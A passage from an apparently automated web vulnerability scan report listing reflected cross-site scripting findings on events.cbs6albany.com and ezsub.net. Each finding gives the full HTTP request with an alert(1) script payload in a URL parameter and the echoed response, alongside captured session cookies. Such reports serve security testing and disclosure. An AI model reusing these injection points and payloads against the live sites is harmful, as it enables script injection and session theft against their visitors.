Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:05:41 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "bd20e45a7b4eb66383c85316387721cc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:05:41 GMT; HttpOnly
Content-Length: 42066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/346845-sanctum-3d?4654f"><script>alert(1)</script>bbe709d4b33=1" />
...[SNIP]...

4.430. http://events.cbs6albany.com/movies/show/354805-sanctum [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /movies/show/354805-sanctum

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d0d"><script>alert(1)</script>b30c7e194be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /movies/show/354805-sanctum?a9d0d"><script>alert(1)</script>b30c7e194be=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:10:16 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "d2ab463365aef1acc79b6bd1da2c72f8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:10:16 GMT; HttpOnly
Content-Length: 39252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/movies/show/354805-sanctum?a9d0d"><script>alert(1)</script>b30c7e194be=1" />
...[SNIP]...

4.431. http://events.cbs6albany.com/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The value of the st request parameter is copied into the HTML document as plain text between tags. The payload 3ede7<script>alert(1)</script>1995b73f8f was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?st=event3ede7<script>alert(1)</script>1995b73f8f&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 44
ETag: "4a81690f3b69186a513aae48693ae59a"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:21 GMT; HttpOnly
Content-Length: 17259

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Invalid search: event3ede7<script>alert(1)</script>1995b73f8f is not a valid search category.
</div>
...[SNIP]...

4.432. http://events.cbs6albany.com/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e880e"%3balert(1)//4f5e099d790 was submitted in the st parameter. This input was echoed as e880e";alert(1)//4f5e099d790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?st=evente880e"%3balert(1)//4f5e099d790&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:09 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 34
ETag: "75f0398b4f7123b6363fa4f06ca8cde8"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:09 GMT; HttpOnly
Content-Length: 16749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
"text";
google_ad_channel ="";
google_color_border = "ff9933";
google_color_bg = "FFFFFF";
google_color_link = "3366CC";
google_color_url = "3366CC";
google_color_text = "333333";
google_hints = "evente880e";alert(1)//4f5e099d790s";

//-->
...[SNIP]...

4.433. http://events.cbs6albany.com/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3295'%3balert(1)//c7b12d2e1bf was submitted in the st parameter. This input was echoed as f3295';alert(1)//c7b12d2e1bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search?st=eventf3295'%3balert(1)//c7b12d2e1bf&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 33
ETag: "3924344597b43dc83d23de6249cb62f1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:14 GMT; HttpOnly
Content-Length: 16632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<script type="text/javascript">
Zvents.tracker.notifySearchView(
'',
'',
'st=eventf3295';alert(1)//c7b12d2e1bf&when=Today&ssi=0&ssrss=5&srss=11');
</script>
...[SNIP]...

4.434. http://events.cbs6albany.com/search [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc86f"><script>alert(1)</script>076e941308e was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?st=eventcc86f"><script>alert(1)</script>076e941308e&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:03 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 41
ETag: "d33187b541929742d32b389b53910866"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:03 GMT; HttpOnly
Content-Length: 17541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<body id="body_eventcc86f"><script>alert(1)</script>076e941308e">
...[SNIP]...

4.435. http://events.cbs6albany.com/search [swhen parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://events.cbs6albany.com
Path:   /search

Issue detail

The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload bdbbd<script>alert(1)</script>c8e9589b31a was submitted in the swhen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?st=event&swhen=Todaybdbbd<script>alert(1)</script>c8e9589b31a HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:51:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "fed90f622cad38580e62fb34a0edf8c2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iM1RvZGF5YmRiYmQ8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BYzhlOTU4OWIzMWEiC2J1Y2tldEYiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAGSIKc3RhdGUiB05Z--43d612017661ca8fd7295b131750187c403fee68; path=/; expires=Fri, 29-Apr-2011 05:51:27 GMT; HttpOnly
Content-Length: 18400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Unrecognized date format: Todaybdbbd<script>alert(1)</script>c8e9589b31a is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

4.436. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce60"><script>alert(1)</script>2ae1c00828f was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=Afce60"><script>alert(1)</script>2ae1c00828f HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="PGTP" value="Afce60"><script>alert(1)</script>2ae1c00828f">
...[SNIP]...

4.437. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ezsub.net
Path:   /isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload 1d459<script>alert(1)</script>fb57b35142c was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5861d459<script>alert(1)</script>fb57b35142c&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

